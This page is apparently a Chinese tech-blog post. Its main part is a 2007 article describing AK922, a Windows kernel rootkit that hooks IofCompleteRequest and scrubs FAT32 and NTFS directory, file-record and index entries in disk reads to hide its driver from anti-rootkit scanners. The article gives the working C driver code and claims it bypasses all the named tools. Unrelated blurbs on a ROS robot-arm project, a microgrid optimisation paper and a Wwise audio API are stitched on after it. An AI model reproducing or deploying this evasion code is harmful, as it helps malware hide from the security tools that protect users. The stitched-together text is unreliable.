AK922: 突破磁盘低级检测实现文件隐藏

AK922: 突破磁盘低级检测实现文件隐藏
作者:Azy
email: Azy000@gmail.com
完成于:2007-08-08

   目前,一些已公开的主流anti-rootkit检测隐藏文件主要有两种方法:第一种是文件系统层的检测,属于这一类的有icesword,darkspy,gmer等。第二种便是磁盘级别的低级检测(Disk Low-Level Scanning),属于这一类的ark也很多,典型代表为rootkit unhooker,filereg(is的插件),rootkit revealer,blacklight等。当然,还有一些工具,它们在应用层上通过调用ZwQueryDirectoryFile来实施检测。
   驱动也好,应用也罢,说白了就是直接或间接发送IRP到下层驱动。第一类的发送到FSD中(fastfat.sys/ntfs.sys),第二类被发送到磁盘驱动(disk.sys),而后IRP便会携带相应的文件信息返回,这时上层应用再根据返回信息进行处理和判断。但是由于Disk级比FS级更底层,IRP返回给我们的是更加接近数据原始组织方式的磁盘扇区信息,所以在Disk层上实施文件检测可以得到更令人信服的结果。但这并不等于说这类检测不能被击败。本文就将介绍一种绕过该类检测的实现方法,当然,这也是在AK922中使用的。
   对于要实现文件隐藏的RK,与其说是“绕过”,还不如说是“拦截” -- 挂钩某些内核函数调用,以便在返回上层之前我们有机会过滤掉待隐藏文件的信息。
   AK922采用的方法是Hook内核函数IofCompleteRequest。这个函数很有意思,因为它不仅是一个几乎在任何驱动中都要调用的函数,而且参数中正好含有IRP。有了IRP,就有了一切。这些特性决定了它很适合做我们的“傀儡”。但更重要的是,一般在驱动中调用IofCompleteRequest之时IRP操作都已完毕,IRP中相关域已经填充了内容,这就便于我们着手直接进行过滤而不用再做诸如发送IRP安装完成例程之类的操作。
   下面就着重说一下工作流程:
   首先,判断MajorFunction是不是IRP_MJ_READ以及IO堆栈中的Device是否是磁盘驱动的设备对象,因为这才是我们要处理的核心IRP,所有ark直接发送到Disk层的IRP在这里都可以被拦截到。
   接下来的处理要特别注意,进入到这里时IRQL是在APC_LEVEL以上的,因此我们不能碰任何IRP中的用户模式缓冲区,一碰极有可能蓝,也就是说我们不能直接处理相关磁盘扇区信息,而必须通过ExQueueWorkItem排队一个WorkItem的方法来处理。除此之外,由于Disk层在设备堆栈中处于*下的位置,大部分IRP发到这里时当前进程上下文早已不是原始IRP发起者的进程上下文了,这里的发起者应理解为ark进程。幸运的是在IRP的Tail.Overlay.Thread域中还保存着原始ETHREAD指针,为了操作用户模式缓冲区,必须调用KeAttachProcess切到IRP发起者的上下文环境中,而这个工作只能在处于PASSIVE_LEVEL级上的工作者线程中执行。在DISPATCH_LEVEL级上,做的事越少越好。
   刚开始我还分两种情况进行处理:因为并不是所有的IRP都不处在原始上下文中,比如icesword发的IRP到这里还是处在icesword.exe进程中的,这时我认为可以不用排队工作项,这样就可以节省很多系统资源,提高过滤效率。于是我试图在DISPATCH_LEVEL级上直接操作用户缓冲区,但这根本行不通。驱动很不稳定,不一会就蓝了。故索性老老实实地排队去了,然后再分情况处理。代码如下:

// 处理Disk Low-Level Scanning
if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->Device) && irpSp->Parameters.Read.Length != 0)
{    
        
    orgnThread = Irp->Tail.Overlay.Thread;
    orgnProcess = IoThreadToProcess(orgnThread);
        
    if(Irp->MdlAddress)
    {        
        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);
            
        // UserBuffer必须有效
        if(UserBuffer)
        {                    
            
            if(KeGetCurrentIrql() == DISPATCH_LEVEL)
            {                    
            
                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));
                
                WorkerCtx->UserBuffer = UserBuffer;
                WorkerCtx->Length = irpSp->Parameters.Read.Length;
                WorkerCtx->EProc = orgnProcess;
                
                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);
                                
                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);
            }
        }
        
    }
}
  

   来到工作者线程,到了PASSIVE_LEVEL级上,切换上下文之后,似乎安全多了。但是以防万一,操作用户模式缓冲区之前还是要调用ProbeForXxx函数先判断一下。相关代码如下:

VOID WorkerThread(PVOID Context)
{
    KIRQL irql;
    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;
    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;
    //PMDL mdl;
        

    if(((PWORKERCTX)Context)->UserBuffer)
    {
        if(eproc != currProc)
        {

            KeAttachProcess(eproc);

            __try{
            
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){

                //DbgPrint("we can't op the buffer now :-(");
                KeDetachProcess();    
                return;
            }
            
            KeDetachProcess();    
            
        }else{

            __try{
            
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){}
        }
    
    }
}

   准备工作终于算是做得差不多了,下面就开始真正涂改磁盘扇区内容了。这里将涉及到FAT32和NTFS磁盘文件结构,我先把要用到的主要结构列出来,其余的大家可以参考《NTFS Documentation》。

typedef struct _INDEX_HEADER{
    UCHAR            magic[4];
    USHORT            UpdateSequenceOffset;
    USHORT            SizeInWords;
    LARGE_INTEGER    LogFileSeqNumber;
    LARGE_INTEGER    VCN;
    ULONG            IndexEntryOffset;    // needed!
    ULONG            IndexEntrySize;
    ULONG            AllocateSize;
}INDEX_HEADER, *PINDEX_HEADER;


typedef struct _INDEX_ENTRY{
    LARGE_INTEGER        MFTReference;
    USHORT            Size;                // needed!
    USHORT            FileNameOffset;
    USHORT            Flags;
    USHORT            Padding;
    LARGE_INTEGER        MFTReferParent;
    LARGE_INTEGER        CreationTime;
    LARGE_INTEGER        ModifyTime;
    LARGE_INTEGER        FileRecModifyTime;
    LARGE_INTEGER        AccessTime;
    LARGE_INTEGER        AllocateSize;
    LARGE_INTEGER        RealSize;
    LARGE_INTEGER        FileFlags;
    UCHAR            FileNameLength;
    UCHAR            NameSpace;
    WCHAR            FileName[1];
}INDEX_ENTRY, *PINDEX_ENTRY;

   在读取磁盘文件信息时每次都是以一个扇区大小(512 bytes)的整数倍进行的,如果不了解相应卷的组织形式和数据结构,那么感觉就是数据多而繁杂,搜索效率也很低。但辅以上述结构便可快速定位待隐藏文件并进行涂改。这里不得不说一句,算法的高效是很重要的,如果采用暴力搜索的方式,那么系统BSOD的概率会大大增加。
   在FAT32卷上,当AK922搜索到文件AK922.sys的目录项时,将其0x0偏移处的文件名的第一个字节置为"0xe5",即标记为删除。这样即可达到欺骗ark的目的。但为了更加隐蔽,不让winhex察觉出来,最好把文件名全部清0。
   处理NTFS卷稍微麻烦些,文件记录和索引项都要抹干净,具体实现见代码,这里不再赘述。

VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)
{
    ULONG i;
    BOOLEAN bIsNtfsIndex;
    BOOLEAN bIsNtfsFile;
    ULONG offset = 0;
    ULONG indexSize = 0;
    PINDEX_ENTRY currIndxEntry = NULL;
    PINDEX_ENTRY preIndxEntry = NULL;
    ULONG currPosition;

    
    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);
    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);

    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)
    {            
    
        for(i = 0; i < BufLen/0x20; i++)
        {
            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))
            {

                *(PUCHAR)UserBuf        = 0xe5;
                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;

                break;
                    
            }

            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);
        
        }

    } else if(bIsNtfsFile) {

        //DbgPrint("FILE0...");

        for(i = 0; i < BufLen / FILERECORDSIZE; i++)
        {
            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))
            {
                memset((PVOID)UserBuf, 0, 0x4);
                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);
                break;
            }
                
            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);
                
        }
            
    } else if(bIsNtfsIndex) {
                            
        //DbgPrint("INDX...");
        // Index Entries
        
        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;
        indexSize = BufLen - offset;
        currPosition = 0;

        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);
        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);
                
        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)
        {
            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))
            {
                memset((PVOID)currIndxEntry->FileName, 0, 18);

                if(currPosition == 0)
                {
                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;
                    break;
                }

                preIndxEntry->Size += currIndxEntry->Size;
                
                break;
            }

            currPosition += currIndxEntry->Size;
            preIndxEntry = currIndxEntry;
            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);
                    
        }
    }
}

   水平有限,欢迎大家与我交流。


参考资料:

[1] - 《NTFS Documentation》
[2] - Azy,《IceSword & Rootkit Unhooker驱动简析》

---------

关于AK922(AzyKit):我写的一个只实现文件隐藏的RK,可以bypass本文提到的所有ark。
本项目采用C++编程语言结合ROS框架构建了完整的双机械臂控制系统,实现了Gazebo仿真环境下的协同运动模拟,并完成了两台实体UR10工业机器人的联动控制。该毕业设计在答辩环节获得98分的优异成绩,所有程序代码均通过系统性调试验证,保证可直接部署运行。 系统架构包含三个核心模块:基于ROS通信架构的双臂协调控制器、Gazebo物理引擎下的动力学仿真环境、以及真实UR10机器人的硬件接口层。在仿真验证阶段,开发了双臂碰撞检测算法和轨迹规划模块,通过ROS控制包实现了末端执行器的同步轨迹跟踪。硬件集成方面,建立了基于TCP/IP协议的实时通信链路,解决了双机数据同步和运动指令分发等关键技术问题。 本资源适用于自动化、机械电子、人工智能等专业方向的课程实践,可作为高年级课程设计、毕业课题的重要参考案例。系统采用模块化设计理念,控制核心与硬件接口分离架构便于功能扩展,具备工程实践能力的学习者可在现有框架基础上进行二次开发,例如集成视觉感知模块或优化运动规划算法。 项目文档详细记录了环境配置流程、参数调试方法和实验验证数据,特别说明了双机协同作业时的时序同步解决方案。所有功能模块均提供完整的API接口说明,便于使用者快速理解系统架构并进行定制化修改。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
【微电网】【创新点】基于非支配排序的蜣螂优化算法NSDBO求解微电网多目标优化调度研究(Matlab代码实现)内容概要:本文围绕基于非支配排序的蜣螂优化算法(NSDBO)在微电网多目标优化调度中的应用展开研究,提出了一种改进的智能优化算法以解决微电网系统中经济性、环保性和能源效率等多重目标之间的权衡问题。通过引入非支配排序机制,NSDBO能够有效处理多目标优化中的帕累托前沿搜索,提升解的多样性和收敛性,并结合Matlab代码实现仿真验证,展示了该算法在微电网调度中的优越性能和实际可行性。研究涵盖了微电网典型结构建模、目标函数构建及约束条件处理,实现了对风、光、储能及传统机组的协同优化调度。; 适合人群:具备一定电力系统基础知识和Matlab编程能力的研究生、科研人员及从事微电网、智能优化算法应用的工程技术人员;熟悉优化算法与能源系统调度的高年级本科生亦可参考。; 使用场景及目标:①应用于微电网多目标优化调度问题的研究与仿真,如成本最小化、碳排放最低与供电可靠性最高之间的平衡;②为新型智能优化算法(如蜣螂优化算法及其改进版本)的设计与验证提供实践案例,推动其在能源系统中的推广应用;③服务于学术论文复现、课题研究或毕业设计中的算法对比与性能测试。; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注NSDBO算法的核心实现步骤与微电网模型的构建逻辑,同时可对比其他多目标算法(如NSGA-II、MOPSO)以深入理解其优势与局限,进一步开展算法改进或应用场景拓展。
### AK::SpatialAudio::Update 函数解析 `AK::SpatialAudio::Update` 是 Audiokinetic Wwise SDK 中用于更新空间音频环境的关键函数[^1]。此函数负责处理所有与空间音频相关的计算,包括声源位置、监听器状态以及其他动态变化。 #### 参数说明 该函数接受多个参数来定义当前的空间音频上下文: - `AkGameObjectID in_gameObjectID`: 游戏对象 ID, 用来唯一标识游戏中的实体。 - `const AkVector& in_position`: 表示物体的位置向量,在三维坐标系中描述了物体的具体位置。 - `const AkTransform* in_pTransform`: 可选参数,提供更详细的变换矩阵信息,通常包含旋转和平移数据。 ```cpp void Update( AkGameObjectID in_gameObjectID, const AkVector& in_position, const AkTransform* in_pTransform = nullptr); ``` #### 使用场景实例 为了更好地理解如何应用这个 API 接口,下面给出一段简单的 C++ 示例代码展示其调用方式: ```cpp // 初始化声音引擎... if (AK::SoundEngine::IsInitialized()) { // 定义一个游戏对象并设置初始位置 AkGameObjectID myObjId; AK::SoundEngine::PostEvent("Play_My_Sound", &myObjId); // 更新该游戏对象的位置至新的坐标(10.0f, 5.0f, -3.0f) AkVector newPosition(10.0f, 5.0f, -3.0f); AK::SpatialAudio::Update(myObjId, newPosition); } ``` 通过上述例子可以看到,当游戏中某个角色移动到新位置时,开发者可以利用 `AK::SpatialAudio::Update` 来同步更新对应的声音属性,从而实现更加真实自然的听觉效果[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值